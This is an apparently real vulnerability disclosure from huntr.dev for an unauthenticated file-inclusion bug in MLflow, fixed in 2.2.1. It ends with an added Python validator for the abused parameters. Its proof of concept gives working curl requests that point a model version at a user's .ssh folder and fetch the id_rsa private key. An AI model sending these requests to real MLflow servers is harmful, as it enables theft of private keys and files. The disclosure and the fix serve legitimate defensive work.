History: Mar 03, 2023 - 5:15 p.m.

LFI/RFI in MLflow

2023-03-03 17:15:07
danmcinerney
www.huntr.dev
mlflow
arbitrary parameter
unauthorized access

EPSS: 0.039 (Low), percentile 92.0%

Description

Local and Remote File Include in MLflow

Proof of Concept

Start the server or UI (it works on both identically)

    mlflow ui --host 127.0.0.1 --port 5001

Create a model

    curl -i -s -k -X $'POST' \
        -H $'Host: 127.0.0.1:5001' \
        -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0' \
        -H $'Accept: */*' \
        -H $'Accept-Language: en-US,en;q=0.5' \
        -H $'Accept-Encoding: gzip, deflate' \
        -H $'Referer: http://127.0.0.1:5001/' \
        -H $'Content-Type: application/json; charset=utf-8' \
        -H $'Content-Length: 19' \
        -H $'Origin: http://127.0.0.1:5001' \
        -H $'Connection: close' \
        -H $'Sec-Fetch-Dest: empty' \
        -H $'Sec-Fetch-Mode: cors' \
        -H $'Sec-Fetch-Site: same-origin' \
        --data-binary $'{\"name\":\"AJAX-API\"}' \
        $'http://127.0.0.1:5001/ajax-api/2.0/mlflow/registered-models/create'

The “name” parameter is arbitrary; the same value is used in the following two requests.

Create a model version

    curl -i -s -k -X $'POST' \
        -H $'Host: 127.0.0.1:5001' \
        -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0' \
        -H $'Accept: */*' \
        -H $'Accept-Language: en-US,en;q=0.5' \
        -H $'Accept-Encoding: gzip, deflate' \
        -H $'Referer: http://127.0.0.1:5001/' \
        -H $'Content-Type: application/json; charset=utf-8' \
        -H $'Content-Length: 55' \
        -H $'Origin: http://127.0.0.1:5001' \
        -H $'Connection: close' \
        -H $'Sec-Fetch-Dest: empty' \
        -H $'Sec-Fetch-Mode: cors' \
        -H $'Sec-Fetch-Site: same-origin' \
        --data-binary $'{\"name\":\"AJAX-API\",\"source\":\"file:///home/danmcinerney/.ssh\"}' \
        $'http://127.0.0.1:5001/ajax-api/2.0/mlflow/model-versions/create'

This is where we set the folder that we want access to. In this case I set the JSON parameter “source” to “file:///home/danmcinerney/.ssh” so that I can access the SSH private keys.

Get artifacts

    curl -i -s -k -X $'GET' \
        -H $'Host: 127.0.0.1:5001' \
        -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0' \
        -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' \
        -H $'Accept-Language: en-US,en;q=0.5' \
        -H $'Accept-Encoding: gzip, deflate' \
        -H $'Connection: close' \
        -H $'Upgrade-Insecure-Requests: 1' \
        -H $'Sec-Fetch-Dest: document' \
        -H $'Sec-Fetch-Mode: navigate' \
        -H $'Sec-Fetch-Site: none' \
        -H $'Sec-Fetch-User: ?1' \
        $'http://127.0.0.1:5001/model-versions/get-artifact?path=id_rsa&name=AJAX-API&version=1'

The “path” URL parameter can now be set to any file in the folder specified in the previous request’s “source” JSON parameter. Note that you can also access other network resources by setting the previous request’s “source” path to things like “s3://bucket/model.pkl/”, which extends this from just local file include to remote file include as well.

This works out of the box on a default installation remotely and with no authentication.

This bug was privately disclosed to MLflow via their Security policy of emailing [email protected] already so no need to contact them again. It has been fixed in the 2.2.1 release. This report is for the CVE submission.
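A server-side check for the two parameters abused above, as an added example (not MLflow's own code and not its 2.2.1 fix): the “source” of a model version is accepted only under an allowlisted artifact prefix, and the “path” parameter may not escape that directory. The prefixes and function names are assumptions chosen for illustration.

```python
import posixpath
from urllib.parse import unquote, urlparse

# Assumed deployment policy (hypothetical values): the only locations a
# registered model version is allowed to point at.
ALLOWED_SOURCE_PREFIXES = (
    "s3://ml-artifacts/models/",
    "file:///srv/mlflow/artifacts/",
)


def normalize_uri(uri: str) -> str:
    """Return scheme://netloc/normalized-path/; a bare path counts as file://."""
    parsed = urlparse(uri)
    scheme = parsed.scheme or "file"
    # Decode percent-escapes and collapse "." / ".." before comparing prefixes.
    path = posixpath.normpath(unquote(parsed.path))
    if not path.startswith("/"):
        raise ValueError("source has no absolute path")
    return f"{scheme}://{parsed.netloc}{path}/"


def is_allowed_source(source: str) -> bool:
    """True only if the normalized source sits under an allowlisted prefix."""
    try:
        return normalize_uri(source).startswith(ALLOWED_SOURCE_PREFIXES)
    except ValueError:
        return False  # fail closed on anything that cannot be normalized


def is_safe_artifact_path(path: str) -> bool:
    """True if the 'path' query parameter stays inside the source directory."""
    decoded = unquote(path)
    if not decoded or decoded.startswith("/") or "\\" in decoded:
        return False
    return ".." not in decoded.split("/")
```

Both checks are needed together: the first stops a model version from being pointed at an arbitrary local or remote location, the second stops a permitted location from being used as a starting point for traversal.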
